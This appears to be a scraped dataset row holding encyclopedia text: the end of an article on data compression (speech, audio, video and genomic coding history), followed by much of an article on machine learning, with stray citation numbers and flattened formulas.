to optimize efficiency, and then code it in a manner that requires a larger segment of data at one time to decode. The inherent latency of the coding algorithm can be critical; for example, when there is a two-way transmission of data, such as with a telephone conversation, significant delays may seriously degrade the perceived quality. In contrast to the speed of compression, which is proportional to the number of operations required by the algorithm, here latency refers to the number of samples that must be analyzed before a block of audio is processed. In the minimum case, latency is zero samples (e.g., if the coder decoder simply reduces the number of bits used to quantize the signal). Time domain algorithms such as LPC also often have low latencies, hence their popularity in speech coding for telephony. In algorithms such as MP3, however, a large number of samples have to be analyzed to implement a psychoacoustic model in the frequency domain, and latency is on the order of 23 ms. Speech encoding is an important category of audio data compression. The perceptual models used to estimate what aspects of speech a human ear can hear are generally somewhat different from those used for music. The range of frequencies needed to convey the sounds of a human voice is normally far narrower than that needed for music, and the sound is normally less complex. As a result, speech can be encoded at high quality using a relatively low bit rate. This is accomplished, in general, by some combination of two approaches: The earliest algorithms used in speech encoding (and audio data compression in general) were the A-law algorithm and the law algorithm. Early audio research was conducted at Bell Labs. There, in 1950, C. Chapin Cutler filed the patent on differential pulse-code modulation (DPCM). 51 In 1973, Adaptive DPCM (ADPCM) was introduced by P. Cummiskey, Nikil S. Jayant and James L. Flanagan. 52 53 Perceptual coding was first used for speech coding compression, with linear predictive coding (LPC). 54 Initial concepts for LPC date back to the work of Fumitada Itakura (Nagoya University) and Shuzo Saito (Nippon Telegraph and Telephone) in 1966. 55 During the 1970s, Bishnu S. Atal and Manfred R. Schroeder at Bell Labs developed a form of LPC called adaptive predictive coding (APC), a perceptual coding algorithm that exploited the masking properties of the human ear, followed in the early 1980s with the code-excited linear prediction (CELP) algorithm which achieved a significant compression ratio for its time. 54 Perceptual coding is used by modern audio compression formats such as MP3 54 and AAC. Discrete cosine transform (DCT), developed by Nasir Ahmed, T. Natarajan and K. R. Rao in 1974, 16 provided the basis for the modified discrete cosine transform (MDCT) used by modern audio compression formats such as MP3, 56 Dolby Digital, 57 58 and AAC. 59 MDCT was proposed by J. P. Princen, A. W. Johnson and A. B. Bradley in 1987, 60 following earlier work by Princen and Bradley in 1986. 61 The world's first commercial broadcast automation audio compression system was developed by Oscar Bonello, an engineering professor at the University of Buenos Aires. 62 In 1983, using the psychoacoustic principle of the masking of critical bands first published in 1967, 63 he started developing a practical application based on the recently developed IBM PC computer, and the broadcast automation system was launched in 1987 under the name Audicom. 64 35 years later, almost all the radio stations in the world were using this technology manufactured by a number of companies because the inventor refuses to get invention patents for his work. He prefers declaring it of Public Domain publishing it 65 A literature compendium for a large variety of audio coding systems was published in the IEEE's Journal on Selected Areas in Communications (JSAC), in February 1988. While there were some papers from before that time, this collection documented an entire variety of finished, working audio coders, nearly all of them using perceptual techniques and some kind of frequency analysis and back-end noiseless coding. 66 Uncompressed video requires a very high data rate. Although lossless video compression codecs perform at a compression factor of 5 to 12, a typical H.264 lossy compression video has a compression factor between 20 and 200. 67 The two key video compression techniques used in video coding standards are the DCT and motion compensation (MC). Most video coding standards, such as the H.26x and MPEG formats, typically use motion-compensated DCT video coding (block motion compensation). 68 69 Most video codecs are used alongside audio compression techniques to store the separate but complementary data streams as one combined package using so-called container formats. 70 Video data may be represented as a series of still image frames. Such data usually contains abundant amounts of spatial and temporal redundancy. Video compression algorithms attempt to reduce redundancy and store information more compactly. Most video compression formats and codecs exploit both spatial and temporal redundancy (e.g. through difference coding with motion compensation). Similarities can be encoded by only storing differences between e.g. temporally adjacent frames (inter-frame coding) or spatially adjacent pixels (intra-frame coding). Inter-frame compression (a temporal delta encoding) (re)uses data from one or more earlier or later frames in a sequence to describe the current frame. Intra-frame coding, on the other hand, uses only data from within the current frame, effectively being still-image compression. 50 The intra-frame video coding formats used in camcorders and video editing employ simpler compression that uses only intra-frame prediction. This simplifies video editing software, as it prevents a situation in which a compressed frame refers to data that the editor has deleted. Usually, video compression additionally employs lossy compression techniques like quantization that reduce aspects of the source data that are (more or less) irrelevant to the human visual perception by exploiting perceptual features of human vision. For example, small differences in color are more difficult to perceive than are changes in brightness. Compression algorithms can average a color across these similar areas in a manner similar to those used in JPEG image compression. 9 As in all lossy compression, there is a trade-off between video quality and bit rate, cost of processing the compression and decompression, and system requirements. Highly compressed video may present visible or distracting artifacts. Other methods other than the prevalent DCT-based transform formats, such as fractal compression, matching pursuit and the use of a discrete wavelet transform (DWT), have been the subject of some research, but are typically not used in practical products. Wavelet compression is used in still-image coders and video coders without motion compensation. Interest in fractal compression seems to be waning, due to recent theoretical analysis showing a comparative lack of effectiveness of such methods. 50 In inter-frame coding, individual frames of a video sequence are compared from one frame to the next, and the video compression codec records the differences to the reference frame. If the frame contains areas where nothing has moved, the system can simply issue a short command that copies that part of the previous frame into the next one. If sections of the frame move in a simple manner, the compressor can emit a (slightly longer) command that tells the decompressor to shift, rotate, lighten, or darken the copy. This longer command still remains much shorter than data generated by intra-frame compression. Usually, the encoder will also transmit a residue signal which describes the remaining more subtle differences to the reference imagery. Using entropy coding, these residue signals have a more compact representation than the full signal. In areas of video with more motion, the compression must encode more data to keep up with the larger number of pixels that are changing. Commonly during explosions, flames, flocks of animals, and in some panning shots, the high-frequency detail leads to quality decreases or to increases in the variable bitrate. Many commonly used video compression methods (e.g., those in standards approved by the ITU-T or ISO) share the same basic architecture that dates back to H.261 which was standardized in 1988 by the ITU-T. They mostly rely on the DCT, applied to rectangular blocks of neighboring pixels, and temporal prediction using motion vectors, as well as nowadays also an in-loop filtering step. In the prediction stage, various deduplication and difference-coding techniques are applied that help decorrelate data and describe new data based on already transmitted data. Then rectangular blocks of remaining pixel data are transformed to the frequency domain. In the main lossy processing stage, frequency domain data gets quantized in order to reduce information that is irrelevant to human visual perception. In the last stage statistical redundancy gets largely eliminated by an entropy coder which often applies some form of arithmetic coding. In an additional in-loop filtering stage various filters can be applied to the reconstructed image signal. By computing these filters also inside the encoding loop they can help compression because they can be applied to reference material before it gets used in the prediction process and they can be guided using the original signal. The most popular example are deblocking filters that blur out blocking artifacts from quantization discontinuities at transform block boundaries. In 1967, A.H. Robinson and C. Cherry proposed a run-length encoding bandwidth compression scheme for the transmission of analog television signals. 71 The DCT, which is fundamental to modern video compression, 72 was introduced by Nasir Ahmed, T. Natarajan and K. R. Rao in 1974. 16 73 H.261, which debuted in 1988, commercially introduced the prevalent basic architecture of video compression technology. 74 It was the first video coding format based on DCT compression. 72 H.261 was developed by a number of companies, including Hitachi, PictureTel, NTT, BT and Toshiba. 75 The most popular video coding standards used for codecs have been the MPEG standards. MPEG 1 was developed by the Motion Picture Experts Group (MPEG) in 1991, and it was designed to compress VHS-quality video. It was succeeded in 1994 by MPEG 2 H.262, 74 which was developed by a number of companies, primarily Sony, Thomson and Mitsubishi Electric. 76 MPEG 2 became the standard video format for DVD and SD digital television. 74 In 1999, it was followed by MPEG 4 H.263. 74 It was also developed by a number of companies, primarily Mitsubishi Electric, Hitachi and Panasonic. 77 H.264 MPEG 4 AVC was developed in 2003 by a number of organizations, primarily Panasonic, Godo Kaisha IP Bridge and LG Electronics. 78 AVC commercially introduced the modern context-adaptive binary arithmetic coding (CABAC) and context-adaptive variable-length coding (CAVLC) algorithms. AVC is the main video encoding standard for Blu-ray Discs, and is widely used by video sharing websites and streaming internet services such as YouTube, Netflix, Vimeo, and iTunes Store, web software such as Adobe Flash Player and Microsoft Silverlight, and various HDTV broadcasts over terrestrial and satellite television. Genetics compression algorithms are the latest generation of lossless algorithms that compress data (typically sequences of nucleotides) using both conventional compression algorithms and genetic algorithms adapted to the specific datatype. In 2012, a team of scientists from Johns Hopkins University published a genetic compression algorithm that does not use a reference genome for compression. HAPZIPPER was tailored for HapMap data and achieves over 20 fold compression (95% reduction in file size), providing 2 to 4 fold better compression and is less computationally intensive than the leading general-purpose compression utilities. For this, Chanda, Elhaik, and Bader introduced MAF-based encoding (MAFE), which reduces the heterogeneity of the dataset by sorting SNPs by their minor allele frequency, thus homogenizing the dataset. 79 Other algorithms developed in 2009 and 2013 (DNAZip and GenomeZip) have compression ratios of up to 1200 fold—allowing 6 billion basepair diploid human genomes to be stored in 2.5 megabytes (relative to a reference genome or averaged over many genomes). 80 81 For a benchmark in genetics genomics data compressors, see 82 It is estimated that the total amount of data that is stored on the world's storage devices could be further compressed with existing compression algorithms by a remaining average factor of 4.5:1. 83 It is estimated that the combined technological capacity of the world to store information provides 1,300 exabytes of hardware digits in 2007, but when the corresponding content is optimally compressed, this only represents 295 exabytes of Shannon information. 84 |
226 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Machine_learning | Machine learning (ML) is a field of study in artificial intelligence concerned with the development and study of statistical algorithms that can learn from data and generalize to unseen data and thus perform tasks without explicit instructions. 1 Recently, artificial neural networks have been able to surpass many previous approaches in performance. 2 ML finds application in many fields, including natural language processing, computer vision, speech recognition, email filtering, agriculture, and medicine. 3 4 When applied to business problems, it is known under the name predictive analytics. Although not all machine learning is statistically based, computational statistics is an important source of the field's methods. The mathematical foundations of ML are provided by mathematical optimization (mathematical programming) methods. Data mining is a related (parallel) field of study, focusing on exploratory data analysis (EDA) through unsupervised learning. 6 7 From a theoretical viewpoint, probably approximately correct (PAC) learning provides a framework for describing machine learning. The term machine learning was coined in 1959 by Arthur Samuel, an IBM employee and pioneer in the field of computer gaming and artificial intelligence. 8 9 The synonym self-teaching computers was also used in this time period. 10 11 Although the earliest machine learning model was introduced in the 1950s when Arthur Samuel invented a program that calculated the winning chance in checkers for each side, the history of machine learning roots back to decades of human desire and effort to study human cognitive processes. 12 In 1949, Canadian psychologist Donald Hebb published the book The Organization of Behavior, in which he introduced a theoretical neural structure formed by certain interactions among nerve cells. 13 Hebb's model of neurons interacting with one another set a groundwork for how AIs and machine learning algorithms work under nodes, or artificial neurons used by computers to communicate data. 12 Other researchers who have studied human cognitive systems contributed to the modern machine learning technologies as well, including logician Walter Pitts and Warren McCulloch, who proposed the early mathematical models of neural networks to come up with algorithms that mirror human thought processes. 12 By the early 1960s an experimental "learning machine" with punched tape memory, called Cybertron, had been developed by Raytheon Company to analyze sonar signals, electrocardiograms, and speech patterns using rudimentary reinforcement learning. It was repetitively "trained" by a human operator teacher to recognize patterns and equipped with a "goof" button to cause it to reevaluate incorrect decisions. 14 A representative book on research into machine learning during the 1960s was Nilsson's book on Learning Machines, dealing mostly with machine learning for pattern classification. 15 Interest related to pattern recognition continued into the 1970s, as described by Duda and Hart in 1973. 16 In 1981 a report was given on using teaching strategies so that an artificial neural network learns to recognize 40 characters (26 letters, 10 digits, and 4 special symbols) from a computer terminal. 17 Tom M. Mitchell provided a widely quoted, more formal definition of the algorithms studied in the machine learning field: "A computer program is said to learn from experience E with respect to some class of tasks T and performance measure P if its performance at tasks in T, as measured by P, improves with experience E. 18 This definition of the tasks in which machine learning is concerned offers a fundamentally operational definition rather than defining the field in cognitive terms. This follows Alan Turing's proposal in his paper "Computing Machinery and Intelligence", in which the question "Can machines think? is replaced with the question "Can machines do what we (as thinking entities) can do? . 19 Modern-day machine learning has two objectives. One is to classify data based on models which have been developed; the other purpose is to make predictions for future outcomes based on these models. A hypothetical algorithm specific to classifying data may use computer vision of moles coupled with supervised learning in order to train it to classify the cancerous moles. A machine learning algorithm for stock trading may inform the trader of future potential predictions. 20 As a scientific endeavor, machine learning grew out of the quest for artificial intelligence (AI). In the early days of AI as an academic discipline, some researchers were interested in having machines learn from data. They attempted to approach the problem with various symbolic methods, as well as what were then termed "neural networks"; these were mostly perceptrons and other models that were later found to be reinventions of the generalized linear models of statistics. 22 Probabilistic reasoning was also employed, especially in automated medical diagnosis. 23 : 488 However, an increasing emphasis on the logical, knowledge-based approach caused a rift between AI and machine learning. Probabilistic systems were plagued by theoretical and practical problems of data acquisition and representation. 23 : 488 By 1980, expert systems had come to dominate AI, and statistics was out of favor. 24 Work on symbolic knowledge-based learning did continue within AI, leading to inductive logic programming(ILP), but the more statistical line of research was now outside the field of AI proper, in pattern recognition and information retrieval. 23 : 708 710, 755 Neural networks research had been abandoned by AI and computer science around the same time. This line, too, was continued outside the AI CS field, as "connectionism", by researchers from other disciplines including Hopfield, Rumelhart, and Hinton. Their main success came in the mid 1980s with the reinvention of backpropagation. 23 : 25 Machine learning (ML), reorganized and recognized as its own field, started to flourish in the 1990s. The field changed its goal from achieving artificial intelligence to tackling solvable problems of a practical nature. It shifted focus away from the symbolic approaches it had inherited from AI, and toward methods and models borrowed from statistics, fuzzy logic, and probability theory. 24 There is a close connection between machine learning and compression. A system that predicts the posterior probabilities of a sequence given its entire history can be used for optimal data compression (by using arithmetic coding on the output distribution). Conversely, an optimal compressor can be used for prediction (by finding the symbol that compresses best, given the previous history). This equivalence has been used as a justification for using data compression as a benchmark for "general intelligence". 25 26 27 An alternative view can show compression algorithms implicitly map strings into implicit feature space vectors, and compression-based similarity measures compute similarity within these feature spaces. For each compressor C(.) we define an associated vector space , such that C(.) maps an input string x, corresponding to the vector norm x . An exhaustive examination of the feature spaces underlying all compression algorithms is precluded by space; instead, feature vectors chooses to examine three representative lossless compression methods, LZW, LZ77, and PPM. 28 According to AIXI theory, a connection more directly explained in Hutter Prize, the best possible compression of x is the smallest possible software that generates x. For example, in that model, a zip file's compressed size includes both the zip file and the unzipping software, since you can not unzip it without both, but there may be an even smaller combined form. Examples of AI-powered audio video compression software include NVIDIA Maxine, AIVC. 29 Examples of software that can perform AI-powered image compression include OpenCV, TensorFlow, MATLAB's Image Processing Toolbox (IPT) and High-Fidelity Generative Image Compression. 30 In unsupervised machine learning, k-means clustering can be utilized to compress data by grouping similar data points into clusters. This technique simplifies handling extensive datasets that lack predefined labels and finds widespread use in fields such as image compression. 31 Data compression aims to reduce the size of data files, enhancing storage efficiency and speeding up data transmission. K-means clustering, an unsupervised machine learning algorithm, is employed to partition a dataset into a specified number of clusters, k, each represented by the centroid of its points. This process condenses extensive datasets into a more compact set of representative points. Particularly beneficial in image and signal processing, k-means clustering aids in data reduction by replacing groups of data points with their centroids, thereby preserving the core information of the original data while significantly decreasing the required storage space. 32 Machine learning and data mining often employ the same methods and overlap significantly, but while machine learning focuses on prediction, based on known properties learned from the training data, data mining focuses on the discovery of (previously) unknown properties in the data (this is the analysis step of knowledge discovery in databases). Data mining uses many machine learning methods, but with different goals; on the other hand, machine learning also employs data mining methods as "unsupervised learning" or as a preprocessing step to improve learner accuracy. Much of the confusion between these two research communities (which do often have separate conferences and separate journals, ECML PKDD being a major exception) comes from the basic assumptions they work with: in machine learning, performance is usually evaluated with respect to the ability to reproduce known knowledge, while in knowledge discovery and data mining (KDD) the key task is the discovery of previously unknown knowledge. Evaluated with respect to known knowledge, an uninformed (unsupervised) method will easily be outperformed by other supervised methods, while in a typical KDD task, supervised methods cannot be used due to the unavailability of training data. Machine learning also has intimate ties to optimization: Many learning problems are formulated as minimization of some loss function on a training set of examples. Loss functions express the discrepancy between the predictions of the model being trained and the actual problem instances (for example, in classification, one wants to assign a label to instances, and models are trained to correctly predict the preassigned labels of a set of examples). 34 The difference between optimization and machine learning arises from the goal of generalization: While optimization algorithms can minimize the loss on a training set, machine learning is concerned with minimizing the loss on unseen samples. Characterizing the generalization of various learning algorithms is an active topic of current research, especially for deep learning algorithms. Machine learning and statistics are closely related fields in terms of methods, but distinct in their principal goal: statistics draws population inferences from a sample, while machine learning finds generalizable predictive patterns. 35 According to Michael I. Jordan, the ideas of machine learning, from methodological principles to theoretical tools, have had a long pre-history in statistics. 36 He also suggested the term data science as a placeholder to call the overall field. 36 Conventional statistical analyses require the a priori selection of a model most suitable for the study data set. In addition, only significant or theoretically relevant variables based on previous experience are included for analysis. In contrast, machine learning is not built on a pre-structured model; rather, the data shape the model by detecting underlying patterns. The more variables (input) used to train the model, the more accurate the ultimate model will be. 37 Leo Breiman distinguished two statistical modeling paradigms: data model and algorithmic model, 38 wherein "algorithmic model" means more or less the machine learning algorithms like Random Forest. Some statisticians have adopted methods from machine learning, leading to a combined field that they call statistical learning. 39 Analytical and computational techniques derived from deep-rooted physics of disordered systems can be extended to large-scale problems, including machine learning, e.g., to analyze the weight space of deep neural networks. 40 Statistical physics is thus finding applications in the area of medical diagnostics. 41 A core objective of a learner is to generalize from its experience. 5 42 Generalization in this context is the ability of a learning machine to perform accurately on new, unseen examples tasks after having experienced a learning data set. The training examples come from some generally unknown probability distribution (considered representative of the space of occurrences) and the learner has to build a general model about this space that enables it to produce sufficiently accurate predictions in new cases. The computational analysis of machine learning algorithms and their performance is a branch of theoretical computer science known as computational learning theory via the Probably Approximately Correct Learning (PAC) model. Because training sets are finite and the future is uncertain, learning theory usually does not yield guarantees of the performance of algorithms. Instead, probabilistic bounds on the performance are quite common. The bias variance decomposition is one way to quantify generalization error. For the best performance in the context of generalization, the complexity of the hypothesis should match the complexity of the function underlying the data. If the hypothesis is less complex than the function, then the model has under fitted the data. If the complexity of the model is increased in response, then the training error decreases. But if the hypothesis is too complex, then the model is subject to overfitting and generalization will be poorer. 43 In addition to performance bounds, learning theorists study the time complexity and feasibility of learning. In computational learning theory, a computation is considered feasible if it can be done in polynomial time. There are two kinds of time complexity results: Positive results show that a certain class of functions can be learned in polynomial time. Negative results show that certain classes cannot be learned in polynomial time. Machine learning approaches are traditionally divided into three broad categories, which correspond to learning paradigms, depending on the nature of the "signal" or "feedback" available to the learning system: Although each algorithm has advantages and limitations, no single algorithm works for all problems. 44 45 46 Supervised learning algorithms build a mathematical model of a set of data that contains both the inputs and the desired outputs. 47 The data, known as training data, consists of a set of training examples. Each training example has one or more inputs and the desired output, also known as a supervisory signal. In the mathematical model, each training example is represented by an array or vector, sometimes called a feature vector, and the training data is represented by a matrix. Through iterative optimization of an objective function, supervised learning algorithms learn a function that can be used to predict the output associated with new inputs. 48 An optimal function allows the algorithm to correctly determine the output for inputs that were not a part of the training data. An algorithm that improves the accuracy of its outputs or predictions over time is said to have learned to perform that task. 18 Types of supervised-learning algorithms include active learning, classification and regression. 49 Classification algorithms are used when the outputs are restricted to a limited set of values, and regression algorithms are used when the outputs may have any numerical value within a range. As an example, for a classification algorithm that filters emails, the input would be an incoming email, and the output would be the name of the folder in which to file the email. Examples of regression would be predicting the height of a person, or the future temperature. 50 Similarity learning is an area of supervised machine learning closely related to regression and classification, but the goal is to learn from examples using a similarity function that measures how similar or related two objects are. It has applications in ranking, recommendation systems, visual identity tracking, face verification, and speaker verification. Unsupervised learning algorithms find structures in data that has not been labeled, classified or categorized. Instead of responding to feedback, unsupervised learning algorithms identify commonalities in the data and react based on the presence or absence of such commonalities in each new piece of data. Central applications of unsupervised machine learning include clustering, dimensionality reduction, 7 and density estimation. 51 Unsupervised learning algorithms also streamlined the process of identifying large indel based haplotypes of a gene of interest from pan-genome. 52 Cluster analysis is the assignment of a set of observations into subsets (called clusters) so that observations within the same cluster are similar according to one or more predesignated criteria, while observations drawn from different clusters are dissimilar. Different clustering techniques make different assumptions on the structure of the data, often defined by some similarity metric and evaluated, for example, by internal compactness, or the similarity between members of the same cluster, and separation, the difference between clusters. Other methods are based on estimated density and graph connectivity. A special type of unsupervised learning called, self-supervised learning involves training a model by generating the supervisory signal from the data itself. 54 55 Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data). Some of the training examples are missing training labels, yet many machine-learning researchers have found that unlabeled data, when used in conjunction with a small amount of labeled data, can produce a considerable improvement in learning accuracy. In weakly supervised learning, the training labels are noisy, limited, or imprecise; however, these labels are often cheaper to obtain, resulting in larger effective training sets. 56 Reinforcement learning is an area of machine learning concerned with how software agents ought to take actions in an environment so as to maximize some notion of cumulative reward. Due to its generality, the field is studied in many other disciplines, such as game theory, control theory, operations research, information theory, simulation-based optimization, multi-agent systems, swarm intelligence, statistics and genetic algorithms. In reinforcement learning, the environment is typically represented as a Markov decision process (MDP). Many reinforcements learning algorithms use dynamic programming techniques. 57 Reinforcement learning algorithms do not assume knowledge of an exact mathematical model of the MDP and are used when exact models are infeasible. Reinforcement learning algorithms are used in autonomous vehicles or in learning to play a game against a human opponent. Dimensionality reduction is a process of reducing the number of random variables under consideration by obtaining a set of principal variables. 58 In other words, it is a process of reducing the dimension of the feature set, also called the "number of features". Most of the dimensionality reduction techniques can be considered as either feature elimination or extraction. One of the popular methods of dimensionality reduction is principal component analysis (PCA). PCA involves changing higher-dimensional data (e.g., 3D) to a smaller space (e.g., 2D). The manifold hypothesis proposes that high-dimensional data sets lie along low-dimensional manifolds, and many dimensionality reduction techniques make this assumption, leading to the area of manifold learning and manifold regularization. Other approaches have been developed which do not fit neatly into this three-fold categorization, and sometimes more than one is used by the same machine learning system. For example, topic modeling, meta-learning. 59 Self-learning, as a machine learning paradigm was introduced in 1982 along with a neural network capable of self-learning, named crossbar adaptive array (CAA). 60 It is learning with no external rewards and no external teacher advice. The CAA self-learning algorithm computes, in a crossbar fashion, both decisions about actions and emotions (feelings) about consequence situations. The system is driven by the interaction between cognition and emotion. 61 The self-learning algorithm updates a memory matrix W w(a,s) such that in each iteration executes the following machine learning routine: It is a system with only one input, situation, and only one output, action (or behavior) a. There is neither a separate reinforcement input nor an advice input from the environment. The backpropagated value (secondary reinforcement) is the emotion toward the consequence situation. The CAA exists in two environments, one is the behavioral environment where it behaves, and the other is the genetic environment, wherefrom it initially and only once receives initial emotions about situations to be encountered in the behavioral environment. After receiving the genome (species) vector from the genetic environment, the CAA learns a goal-seeking behavior, in an environment that contains both desirable and undesirable situations. 62 Several learning algorithms aim at discovering better representations of the inputs provided during training. 63 Classic examples include principal component analysis and cluster analysis. Feature learning algorithms, also called representation learning algorithms, often attempt to preserve the information in their input but also transform it in a way that makes it useful, often as a pre-processing step before performing classification or predictions. This technique allows reconstruction of the inputs coming from the unknown data-generating distribution, while not being necessarily faithful to configurations that are implausible under that distribution. This replaces manual feature engineering, and allows a machine to both learn the features and use them to perform a specific task. Feature learning can be either supervised or unsupervised. In supervised feature learning, features are learned using labeled input data. Examples include artificial neural networks, multilayer perceptrons, and supervised dictionary learning. In unsupervised feature learning, features are learned with unlabeled input data. Examples include dictionary learning, independent component analysis, autoencoders, matrix factorization 64 and various forms of clustering. 65 66 67 Manifold learning algorithms attempt to do so under the constraint that the learned representation is low-dimensional. Sparse coding algorithms attempt to do so under the constraint that the learned representation is sparse, meaning that the mathematical model has many zeros. Multilinear subspace learning algorithms aim to learn low-dimensional representations directly from tensor representations for multidimensional data, without reshaping them into higher-dimensional vectors. 68 Deep learning algorithms discover multiple levels of representation, or a hierarchy of features, with higher-level, more abstract features defined in terms of (or generating) lower-level features. It has been argued that an intelligent machine is one that learns a representation that disentangles the underlying factors of variation that explain the observed data. 69 Feature learning is motivated by the fact that machine learning tasks such as classification often require input that is mathematically and computationally convenient to process. However, real-world data such as images, video, and sensory data has not yielded attempts to algorithmically define specific features. An alternative is to discover such features or representations through examination, without relying on explicit algorithms. Sparse dictionary learning is a feature learning method where a training example is represented as a linear combination of basis functions and assumed to be a sparse matrix. The method is strongly NP-hard and difficult to solve approximately. 70 A popular heuristic method for sparse dictionary learning is the k-SVD algorithm. Sparse dictionary learning has been applied in several contexts. In classification, the problem is to determine the class to which a previously unseen training example belongs. For a dictionary where each class has already been built, a new training example is associated with the class that is best sparsely represented by the corresponding dictionary. Sparse dictionary learning has also been applied in image de-noising. The key idea is that a clean image patch can be sparsely represented by an image dictionary, but the noise cannot. 71 In data mining, anomaly detection, also known as outlier detection, is the identification of rare items, events or observations which raise suspicions by differing significantly from the majority of the data. 72 Typically, the anomalous items represent an issue such as bank fraud, a structural defect, medical problems or errors in a text. Anomalies are referred to as outliers, novelties, noise, deviations and exceptions. 73 In particular, in the context of abuse and network intrusion detection, the interesting objects are often not rare objects, but unexpected bursts of inactivity. This pattern does not adhere to the common statistical definition of an outlier as a rare object. Many outlier detection methods (in particular, unsupervised algorithms) will fail on such data unless aggregated appropriately. Instead, a cluster analysis algorithm may be able to detect the micro-clusters formed by these patterns. 74 Three broad categories of anomaly detection techniques exist. 75 Unsupervised anomaly detection techniques detect anomalies in an unlabeled test data set under the assumption that the majority of the instances in the data set are normal, by looking for instances that seem to fit the least to the remainder of the data set. Supervised anomaly detection techniques require a data set that has been labeled as "normal" and "abnormal" and involves training a classifier (the key difference from many other statistical classification problems is the inherently unbalanced nature of outlier detection). Semi-supervised anomaly detection techniques construct a model representing normal behavior from a given normal training data set and then test the likelihood of a test instance to be generated by the model. Robot learning is inspired by a multitude of machine learning methods, starting from supervised learning, reinforcement learning, 76 77 and finally meta-learning (e.g. MAML). Association rule learning is a rule-based machine learning method for discovering relationships between variables in large databases. It is intended to identify strong rules discovered in databases using some measure of "interestingness". 78 Rule-based machine learning is a general term for any machine learning method that identifies, learns, or evolves "rules" to store, manipulate or apply knowledge. The defining characteristic of a rule-based machine learning algorithm is the identification and utilization of a set of relational rules that collectively represent the knowledge captured by the system. This is in contrast to other machine learning algorithms that commonly identify a singular model that can be universally applied to any instance in order to make a prediction. 79 Rule-based machine learning approaches include learning classifier systems, association rule learning, and artificial immune systems. Based on the concept of strong rules, Rakesh Agrawal, Tomasz Imieli ski and Arun Swami introduced association rules for discovering regularities between products in large-scale transaction data recorded by point-of-sale (POS) systems in supermarkets. 80 For example, the rule o n i o n s , p o t a t o e s b u r g e r displaystyle mathrm onions,potatoes Rightarrow mathrm burger found in the sales data of a supermarket would indicate that if a customer buys onions and potatoes together, they are likely to also buy hamburger meat. Such information can be used as the basis for decisions about marketing activities such as promotional pricing or product placements. In addition to market basket analysis, association rules are employed today in application areas including Web usage mining, intrusion detection, continuous production, and bioinformatics. In contrast with sequence mining, association rule learning typically does not consider the order of items either within a transaction or across transactions. Learning classifier systems (LCS) are a family of rule-based machine learning algorithms that combine a discovery component, typically a genetic algorithm, with a learning component, performing either supervised learning, reinforcement learning, or unsupervised learning. They seek to identify a set of context-dependent rules that collectively store and apply knowledge in a piecewise manner in order to make predictions. 81 Inductive logic programming (ILP) is an approach to rule learning using logic programming as a uniform representation for input examples, background knowledge, and hypotheses. Given an encoding of the known background knowledge and a set of examples represented as a logical database of facts, an ILP system will derive a hypothesized logic program that entails all positive and no negative examples. Inductive programming is a related field that considers any kind of programming language for representing hypotheses (and not only logic programming), such as functional programs. Inductive logic programming is particularly useful in bioinformatics and natural language processing. Gordon Plotkin and Ehud Shapiro laid the initial theoretical foundation for inductive machine learning in a logical setting. 82 83 84 Shapiro built their first implementation (Model Inference System) in 1981: a Prolog program that inductively inferred logic programs from positive and negative examples. 85 The term inductive here refers to philosophical induction, suggesting a theory to explain observed facts, rather than mathematical induction, proving a property for all members of a well-ordered set. A machine learning model is a type of mathematical model that, after being "trained" on a given dataset, can be used to make predictions or classifications on new data. During training, a learning algorithm iteratively adjusts the model's internal parameters to minimize errors in its predictions. 86 By extension, the term "model" can refer to several levels of specificity, from a general class of models and their associated learning algorithms to a fully trained model with all its internal parameters tuned. 87 Various types of models have been used and researched for machine learning systems, picking the best model for a task is called model selection. Artificial neural networks (ANNs), or connectionist systems, are computing systems vaguely inspired by the biological neural networks that constitute animal brains. Such systems "learn" to perform tasks by considering examples, generally without being programmed with any task-specific rules. An ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition. 88 Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels, and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision-making. Support-vector machines (SVMs), also known as support-vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category. 89 An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel 90 ), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. 